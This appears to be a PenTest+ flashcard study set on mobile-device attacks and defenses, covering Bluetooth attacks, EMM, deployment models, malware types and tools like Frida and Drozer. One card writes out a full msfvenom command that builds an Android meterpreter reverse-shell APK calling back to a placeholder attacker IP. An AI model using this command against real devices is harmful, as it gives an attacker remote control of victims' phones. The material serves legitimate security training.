Pentest+ Lesson 11 - Targeting Mobile Devices
biometric integration
A system that employs a biometric, such as a fingerprint or facial recognition, when authenticating into a system
Patching Fragmentation
A threat that can occur when device updates are not implemented in a timely manner.
In addition to phishing, pharming, and baiting the victim, malicious actors use other techniques that are specific to mobile devices. List three or four social engineering techniques that are used with mobile devices.
Answers may vary Vishing is phishing using Voice over Internet Protocol (VoIP). This attack is possible as it is easy to spoof the sender information when using a VoIP call. SMiShing is a form of phishing that uses text messages to entice users to click on a link or provide information. Drive by downloads can occur while browsing the internet, as a victim can click on a link that will download malicious software. Many times, the victim is unaware of this activity. Spamming is sending unsolicited ads and calls to a mobile user, which can be done either by using a text or phone call. Browser Hijackers take a web request and send it to another search engine or display persistent advertising, with the goal of stealing information.
When using a Bluetooth-enabled device, best practice techniques will minimize the potential for an attack. List two or three techniques.
Answers may vary. Best practice techniques to secure your Bluetooth connection include: Keep your device non-discoverable. Disable Bluetooth when not using the device. Don't accept unfamiliar requests to pair. Periodically check your list of paired devices.
Enterprise mobility management allows administrators to work from a centralized console and provide remote access to managed devices. List four to five features of an EMM solution.
Answers may vary. Common features of an EMM include: Enrolling and authenticating devices Locking and wiping the device Pushing out OS, app, and firmware updates to devices Locating devices through Global Positioning Software (GPS) and other technologies Preventing root access or jailbreaking devices Creating an encrypted container to keep sensitive organization data compartmentalized Restricting certain features and services based on access control policies
Many companies adhere to a structured mobile device implementation model which describes the way employees are provided with devices and applications. Describe two or three deployment models.
Answers may vary. Device deployment models can include: Bring your own device (BYOD)—the mobile device is owned by the employee; however, it must be corporate compliant in terms of OS version and functionality. Corporate owned, business only (COBO)—the device is the property of the company and may only be used for company business. Corporate owned, personally enabled (COPE)—the device is supplied and owned by the company. The employee may use it to access personal email, social media, and web browsing; however, they must be compliant with any acceptable use policies in force. Choose your own device (CYOD)—much the same as COPE; however, the employee can select a device from a curated list.
In an environment where there are multiple types of mobile devices, the organization can face numerous threats and vulnerabilities. List three or four issues that can affect the business logic process.
Answers may vary. Issues that can create a vulnerable environment when dealing with mobile devices include: Deperimeterization Strained infrastructure Forensics complications Lost or stolen devices Lack of anti-malware protection Using known vulnerable components Dependency vulnerabilities Mobile device storage Passcode vulnerabilities
Prior to deployment, it's good practice to test any APIs in your project. One tool that the team can use is Postman. List three or fours tasks you can do with Postman.
Answers may vary. Postman has many features so that you can accomplish the following: Explore and create an API. Build and run a test suite. Work with other team members. Analyze results and run reports. Integrate within the DevOps life cycle.
Describe how sandbox analysis can help you understand what happens when a virus executes.
Answers may vary. Sandbox analysis is using virtualization to provide a safe environment to analyze malware. You can create a sandbox using a virtual machine, or use a pre-made sandbox designed to provide a full analysis of malware activity.
Within any organization there are generally some common elements when dealing with mobile devices. List three or four activities that are completed to ensure secure mobile device infrastructure.
Answers may vary. Some of the activities that are completed to ensure secure mobile device infrastructure can include the following: Mobile Device Assessment—provides an overview of compliance and business logic issues. BYOD Approval—selects appropriate devices and creates policies. Secure App Development—creates organization specific apps in-line with organizational policy. Mobile APP Testing—includes Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST).
Some tools work in symphony with one another. Two examples are the tools Frida and Objection. Explain how you would use Frida and Objection when PenTesting.
Answers may vary. When using Objection, the team can run custom Frida scripts and interact with the filesystem on non-jailbroken iOS devices. It uses Frida to inject objects into an application and then monitors the behavior. You can also simulate a jailbroken environment and observe an iOS application within the existing constraints of a sandbox environment or dump the iOS keychain.
Lack of antimalware protection
Not only can malware infect a user's device, but it could likewise spread throughout the network when the device connects. Many mobile devices lack built-in anti-malware software.
remote wipes
Software that allows deletion of data and settings on a mobile device to be initiated from a remote server.
reverse engineering
The process of analyzing the structure of hardware or software to reveal more about how it functions.
sandbox analysis
Using a virtualized environment, this provides a safe environment to analyze malware.
mobile device testing framework
Within the framework, some of the activity can include: Mobile Device Assessment—provides an overview of compliance and business logic issues. BYOD Approval—selects appropriate devices and creating policies. Secure App Development—creates organization specific apps in-line with organizational policy. Mobile APP Testing—includes Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST). To achieve these goals, there are several options that include tools and guidelines that are part of a suite. Let's investigate some of the choices available.
EMM (Enterprise Mobility Management)
a class of management software designed to apply security policies to mobile devices and apps in the enterprise
Bluejacking
a method used by attackers to send out unwanted text messages, images, or videos to a mobile phone, tablet, or laptop using a Bluetooth connection. Bluetooth requires relatively close proximity, usually within 30 feet of the target device to be effective. However, in a busy area such as an airport, this attack is possible.
Bluesnarfing
a more aggressive attack, as a malicious actor is able to read information from a victim's Bluetooth device. The end goal is to glean sensitive data from the victim, like their contacts, calendars, email messages, text messages, etc.
Objection
a runtime exploration toolkit that works on iOS devices. It is a scriptable debugger that allows you to perform various security related tasks on unencrypted iOS applications. With it, the team can run custom Frida scripts and interact with the filesystems on non-jailbroken iOS devices. It uses Frida to inject objects into an application and then monitors the behavior. You can also simulate a jailbroken environment and observe an iOS application within the existing constraints of a sandbox environment or dump the iOS keychain.
API
a set of commands that is used to send and receive data between systems, such as a client and a server
Ettercap
a suite of tools that can be used to launch various types of Man in The Middle (or on-path) attacks.
APK file
an app designed to run on an Android device. Two Android application decompilers that work with APK files are the APKX tool and APK Studio, and these can be used to monitor the behavior of an APK file. The difference is as follows: APKX tool is an Android APK decompiler that allows you to pull and analyze the Java source code to see what's going on inside. APK Studio is an integrated development environment (IDE) designed so you can decompile and/or edit an APK file.
Burp Suite
an integrated platform for testing web applications along with a mobile assistant designed to test iOS devices.
Trojans
appear as a useful program, such as a game or utility, but contain malware that allows hackers to take control of the victim's computer remotely.
Worms
are a virus sub-class that have the ability to spread without any help from a transport agent such as an email attachment.
Using known vulnerable components
can occur when developers use components that have known vulnerabilities and have not thoroughly tested components and applications prior to publishing.
execution of activities using root
can occur when the user roots or jailbreaks their system to improve the performance of the device. In most cases, this action will leave the system vulnerable to an attack.
Viruses
can self-replicate, yet need a way to propagate to other hosts.
Passcode vulnerabilities
commonly occur as not all systems require frequent password changes. In some cases, the user may fail to implement any password on the device. In addition, although multi-factor authentication can be a more secure option when defending a mobile device, the user may choose not to use this option.
Forensics complications
dealing with BYOD during a forensic exercise may prove difficult or even impossible and compromise the integrity of an investigation
Deperimeterization
employees that take sensitive data outside of the corporate perimeter and do not properly secure their devices will risk data exfiltration
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<available port> R > malware.apk
example uses a tool called msfvenom, part of the Metasploit Framework, to create a malicious app package for Android devices. This creates a reverse TCP listener back to the attacker's machine and saves it as an app package, or APK file.
Dependency vulnerabilities
exist as some applications on the surface are secure; however, they may have to be dependent on other applications that are vulnerable. This dependency can result in widespread vulnerabilities that can affect the entire system.
Mobile device storage
might be insecure or less protected, allowing a malicious actor to gain access to sensitive data on the device.
over-reach of permissions
often up to the individual to decide what services to access when downloading and installing an app. Instead of using the principle of least privilege, a consumer may feel it is necessary to allow an app to access services and data stores that are generally restricted.
Drozer
open-source software used for testing for vulnerabilities on Android devices. It is an attack framework that allows you to find security flaws in the app and devices. It works as a client-server model and lets you assume the role of an Android app so you can observe the behavior of the app as it interacts with other apps.
Frida
open-source tool that can work with a wide range of operating systems. It includes custom developer tools that help the PenTest team during application PenTesting, as you can examine the plaintext data that is being passed. In addition, it has many other features that allow you to do the following: Dump process memory In-process fuzzing Anti-jailbreak (or root) detection Change a program's behavior
Rootkits
provide a backdoor for illegal access to a host.
Mobile Security Framework (MobSF)
provide an automated evaluation of code and malware analysis using both static and dynamic analysis as follows: Static analysis can evaluate both Android and iOS. Dynamic analysis is able to assess an Android platform. The framework conducts a thorough assessment to determine parameters such as OS reputation, whether it has been rooted or jail broken, and app security.
Postman
provides an interactive and automatic environment used to interact and test an HTTP API. Along with having an intuitive GUI for constructing API requests, this tool is rich with features so that you can accomplish the following: Explore and create an API. Build and run a test suite. Work with other team members. Analyze results and run reports. Integrate within the DevOps life cycle.
Mobile Security Testing Guide
provides an intuitive framework that steps you through the assessment process. Key elements include: A dashboard to summarize testing information along with contact information Security recommendations for both Android and iOS devices Specifications for testing resiliency against reverse engineering and tampering In addition to providing extensive checklists, you'll also find hyperlinks for external resources. All requirements are outlined in an easy-to-read spreadsheet format
Spyware
records keystrokes and other activity and sends to a collection site.
business logic process
represents the flow of information from the time the user requests access to the time the request hits a resource. A vulnerability can exist in any of the steps taken to access the resource, and can include the ability to modify cookies, escalate privilege, and circumvent controls.
Strained infrastructure
the addition of multiple devices can place a strain on the network and cause it to stop functioning at optimum capacity and may lead to an unintentional DoS
Android SDK tools
tools that have packages so you can design, build, and test mobile apps for Android devices along with reverse engineering an existing device.
Lost or stolen devices
unencrypted data on a phone or tablet is at risk of compromise if that phone or tablet is lost or stolen.